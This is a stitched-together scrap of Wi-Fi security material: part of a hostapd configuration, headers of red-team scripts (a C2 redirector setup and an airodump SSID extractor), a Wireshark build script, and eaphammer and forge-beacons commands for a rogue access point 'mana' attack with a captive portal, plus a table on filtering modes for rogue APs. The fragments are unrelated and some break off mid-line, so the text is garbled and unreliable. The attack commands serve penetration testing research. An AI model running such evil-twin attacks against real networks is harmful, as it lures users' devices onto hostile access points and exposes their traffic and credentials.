Source: https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
#ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
# version 2. However, there are many client implementations that do not handle
#!/bin/bash
# Name: redir-create.sh
# Author: @s0lst1c3
# Description: Simple Bash script that creates a mod_rewrite redirector
# using Joe Vest's cs2modrewrite tool.
# Syntax: ./redir-create.sh <profile path> <teamserver url> <decoy url> <redirector ip> <ssh user> <domain>
apache_default_ssl_conf="/etc/apache2/sites-enabled/default-ssl.conf"
apache_conf="/etc/apache2/apache2.conf"
s0lst1c3 / extract_ssids.py
Created April 1, 2020 17:23
Quick hacky script for extracting SSIDs from a set of airodump-ng CSV files
import glob
all_ssids = set([])
for input_file in glob.glob('*.csv'):
    with open(input_file) as fd:
        for line in fd:
            if line.split(',')[0] == 'BSSID':
                continue
            if line.split(',')[0] == 'Station MAC':
                break
            line_len = len(line.split(','))
s0lst1c3 / build-wireshark-dev.py
Created November 12, 2019 07:35
Automates the build process for Wireshark 3.1.X (dev) on Kali
#!/usr/bin/env python3
# Name: build-wireshark-dev.py
# Author: @s0lst1c3
# Email: gabriel@specterops.io
# Description: Automates the build process for Wireshark 3.1.X (dev) on Kali
# Last tested: Nov 12 2019
import os
import shutil
# transmit burst of 5 forged beacon packets for each entry in our whitelist to force client device to connect
./forge-beacons -i wlan1 \
    --bssid de:ad:be:ef:13:37 \
    --known-essids-file ssid-whitelist.txt \
    --dst-addr 11:22:33:11:22:33 \
    --burst-count 5
# execute a mana attack but only respond to ESSIDs in whitelist
./eaphammer -i wlan0 \
    --bssid de:ad:be:ef:13:37 \
    --mana \
    -e bananas \
    --ssid-whitelist ssid-whitelist.txt \
    --mac-whitelist mac-whitelist.txt \
    --known-beacons \
    --captive-portal
# create mac address whitelist containing the mac address of our target station (another spoiler)
echo '11:22:33:11:22:33' > mac-whitelist.txt
# create an ESSID whitelist file (this is a spoiler for Part III of this series)
for ssid in "apples" "oranges" "grapes" "pears"; do
    echo "$ssid" >> ssid-whitelist.txt
done
| MFACL Type | MFACL Mode | Effect |
| --- | --- | --- |
| MAC-based | whitelist | the rogue AP will only respond to probe requests from specific devices making it invisible to any device not in the whitelist |
| MAC-based | blacklist | the rogue AP will ignore probe requests from specific devices making it invisible to any device not in the blacklist |
| SSID-based | whitelist | the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist |
| SSID-based | blacklist | the rogue AP will ignore probe requests for specific ESSIDs |